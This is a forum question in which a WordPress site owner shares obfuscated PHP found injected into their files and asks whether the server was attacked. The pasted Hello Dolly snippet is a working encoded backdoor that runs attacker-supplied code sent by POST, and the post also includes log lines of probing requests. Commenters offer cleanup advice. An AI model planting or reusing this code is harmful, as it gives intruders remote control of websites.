HsNCiByZXR1cm4gJGV2YTFmWTJiMDFsemM4bDUoJGV2YTFmWTJibzYxem84bDEsIGV2YTFmWTJiYWsxY1YwaXIoKS4iXG4iLiJceDI0XDYxIiwgJGV2YTFmWTJibzYxem84bDcsMSk7DQogfSBlbHNlIHsgcmV0dXJuICRldmExZlkyYm82MXpvOGw3OyB9DQogfSB9DQokZXZhMWZZMmJvNjF6bzgxNyA9ICJceDZmXDE0Mlx4NWZcMTYzXHg3NFwxNDFceDcyXDE2NCI7ICRldmExZlkyYm82MXpvODE3KCJceDY1XDE2Nlx4NjFcNjFceDY2XDEzMVx4MzJcMTQyXHg2MVwxNTNceDMxXDE0M1x4NTZcNjJceDY5XDE2MiIpOw0KCX0\x4e\103\x6e\60\x3d\42\x29\51\x3b\57\x2f"); ?>
```

Also I found this in the Hello Dolly plugin:

```
$cookey = "a84f98b2c1"; 
preg_replace("\x23\50\x2e\53\x29\43\x69\145","\x40\145\x76\141\x6c\50\x22\134\x31\42\x29\73","\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22\141\x57\131\x67\113\x47\154\x7a\143\x32\126\x30\113\x43\122\x66\122\x30\126\x55\127\x79\112\x6a\142\x32\71\x72\141\x57\125\x69\130\x53\153\x70\111\x48\163\x67\132\x57\116\x6f\142\x79\101\x69\131\x32\71\x76\141\x32\154\x6c\120\x54\121\x69\117\x79\102\x70\132\x69\101\x6f\141\x58\116\x7a\132\x58\121\x6f\112\x46\71\x51\124\x31\116\x55\127\x79\122\x6a\142\x32\71\x72\132\x58\154\x64\113\x53\153\x67\121\x47\126\x32\131\x57\167\x6f\131\x6d\106\x7a\132\x54\131\x30\130\x32\122\x6c\131\x32\71\x6b\132\x53\147\x6b\130\x31\102\x50\125\x31\122\x62\112\x47\116\x76\142\x32\164\x6c\145\x56\60\x70\113\x54\163\x67\132\x58\150\x70\144\x44\163\x67\146\x51\75\x3d\42\x29\51\x3b");
```

In my server logs I found this entry:

78.156.113.113 - - [06/Jun/2013:05:09:01 +0100] "POST /dev/conner/wp-content/plugins/hello.php?cookie=1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows)"
78.156.113.113 - - [06/Jun/2013:05:09:07 +0100] "POST /mdm/newsite/wp-content/plugins/hello.php?cookie=1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows)"

Has the server been attacked somehow?

Comment: If something has appeared on there that you didn't add there, then yes, your site has been compromised. Restore from a known good backup, and make sure Wordpress andyour plugins are all using the latest versions.

Comment: yes. your server especially site is hacked.

Comment: Copy of http://stackoverflow.com/questions/16948736/all-wordpress-files-are-hacked-how-to-remove-the-encoded-injection. Off Topic.

Comment: I am helping a customer whose server hosting many sites have this infection, without backups. My approach will be to `sed -i` all `php` files to match and if found, remove that 1st long line.